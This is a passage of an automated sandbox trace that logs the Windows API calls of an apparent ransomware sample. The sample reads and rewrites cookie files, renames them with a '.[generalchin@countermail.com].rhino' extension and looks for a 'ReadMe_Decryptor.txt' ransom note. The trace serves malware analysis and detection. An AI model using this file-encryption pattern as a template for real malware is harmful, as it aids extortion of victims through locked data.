hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09b8 | out: hHeap=0x6d0000) returned 1 [0089.811] WriteFile (in: hFile=0x104, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0x376, lpOverlapped=0x0) returned 1 [0089.811] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0089.811] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x376, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.811] CloseHandle (hObject=0x104) returned 1 [0089.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.813] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0688 [0089.813] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.813] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0688 | out: hHeap=0x6d0000) returned 1 [0089.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0500 | out: hHeap=0x6d0000) returned 1 [0089.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.816] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xc4 [0089.816] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1e4, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.816] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.816] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.818] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.819] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xc4, lpOverlapped=0x0) returned 1 [0089.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.819] GetLastError () returned 0x0 [0089.819] SetLastError (dwErrCode=0x0) [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x23b00f0 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01c0 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02c8 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01c0 | out: hHeap=0x6d0000) returned 1 [0089.820] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01c0 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e4) returned 0x23b0450 [0089.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01c0 | out: hHeap=0x6d0000) returned 1 [0089.821] WriteFile (in: hFile=0x104, lpBuffer=0x23b0450*, nNumberOfBytesToWrite=0x1e4, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0450*, lpNumberOfBytesWritten=0x2cfa04*=0x1e4, lpOverlapped=0x0) returned 1 [0089.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0450 | out: hHeap=0x6d0000) returned 1 [0089.822] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1e4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.822] CloseHandle (hObject=0x104) returned 1 [0089.823] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.823] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0450 [0089.823] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.823] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0450 | out: hHeap=0x6d0000) returned 1 [0089.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02c8 | out: hHeap=0x6d0000) returned 1 [0089.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.824] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.824] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.824] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.825] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.825] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x21f [0089.825] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x33f, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.825] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.825] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.827] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.828] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x21f, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x21f, lpOverlapped=0x0) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.828] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.828] GetLastError () returned 0x0 [0089.828] SetLastError (dwErrCode=0x0) [0089.828] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21f) returned 0x23b0198 [0089.828] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b03c0 [0089.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b04c8 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03c0 | out: hHeap=0x6d0000) returned 1 [0089.829] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.829] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b03c0 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0650 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03c0 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0798 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0650 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0980 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0798 | out: hHeap=0x6d0000) returned 1 [0089.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0089.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0980 | out: hHeap=0x6d0000) returned 1 [0089.830] WriteFile (in: hFile=0x104, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0x33f, lpOverlapped=0x0) returned 1 [0089.831] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0089.831] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x33f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.831] CloseHandle (hObject=0x104) returned 1 [0089.832] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.832] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0650 [0089.832] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.832] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0650 | out: hHeap=0x6d0000) returned 1 [0089.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04c8 | out: hHeap=0x6d0000) returned 1 [0089.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.833] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.833] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.833] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.835] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x110 [0089.835] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x230, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.835] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.835] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.836] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.837] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x110, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x110, lpOverlapped=0x0) returned 1 [0089.837] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.837] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.837] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.837] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.837] GetLastError () returned 0x0 [0089.837] SetLastError (dwErrCode=0x0) [0089.837] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.837] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b00f0 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0208 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0310 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0208 | out: hHeap=0x6d0000) returned 1 [0089.838] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: 